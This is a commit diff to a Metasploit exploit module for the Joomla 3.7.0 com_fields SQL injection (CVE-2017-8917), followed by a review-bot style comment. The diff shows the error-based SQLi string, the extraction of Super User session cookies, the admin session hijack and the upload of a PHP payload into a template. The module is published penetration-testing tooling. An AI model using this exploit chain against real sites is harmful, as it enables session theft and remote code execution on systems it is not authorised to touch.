Changes suggested by h00die

GSoC/Meterpreter_Web_Console
Luis Hernandez 2018-03-08 20:13:01 -05:00
parent 05a653b853
commit 048d0d1fe4
2 changed files with 14 additions and 15 deletions


@ -1,7 +1,7 @@
## Vulnerable Application
This module exploits a sql injection in the core of Joomla 3.7.0.
This vulnerability can allow remote code execution.
This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
## Verification
@ -15,7 +15,7 @@
## Scenarios
### Joomal 3.7.0 and an administrator must be authenticated in the backend
### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator
```
msf > use exploit/unix/webapp/joomla_comfields_sqli_rce


@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Joomla Component Fields SQLi Remote Code Execution",
'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
'Description' => %q{
This module exploits a SQL injection vulnerability found in Joomla versions
3.7.0.
@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2017-8917' ], # SQLi
['EDB', '42033'],
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
],
'Payload' =>
@ -38,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 3.7.0 ', {} ]
[ 'Joomla 3.7.0', {} ]
],
'Privileged' => false,
'DisclosureDate' => "May 17 2017",
'DisclosureDate' => 'May 17 2017',
'DefaultTarget' => 0))
register_options(
@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
def sqli( tableprefix , option)
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
# The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions.
if option == 'check'
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
else
@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
}
})
return res
end
@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Retrieve the admin session using our retrieved table prefix
res = sqli("#{table_prefix}_", 'exploit')
if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
auth_cookie_part = $1
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote
# Modify cookie to authenticated admin
auth_cookie = cookie_begin
auth_cookie << "="
auth_cookie << '='
auth_cookie << auth_cookie_part
auth_cookie << ";"
auth_cookie << ';'
# Authenticated session
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie
})
@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Retrieve template view
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("#{peer} - Creating file [ #(unknown).php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
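Review bot: The signature `def sqli( tableprefix , option)` in the hunk at -68,9 keeps the stray spaces inside the parentheses and before the comma, which is at odds with the quote normalisation this commit performs on the surrounding lines; it should read `def sqli(tableprefix, option)`. The same cleanup pass could replace `auth_cookie_part = $1` following the `res.body =~ /qqq(.*)qqq/` match in the -110,7 hunk with `auth_cookie_part = Regexp.last_match(1)` (or a named capture), which keeps the extracted value explicit instead of relying on the magic global. Both `sqli` and the method containing the cookie match begin or continue outside their hunks, so the rest of their bodies could not be reviewed here.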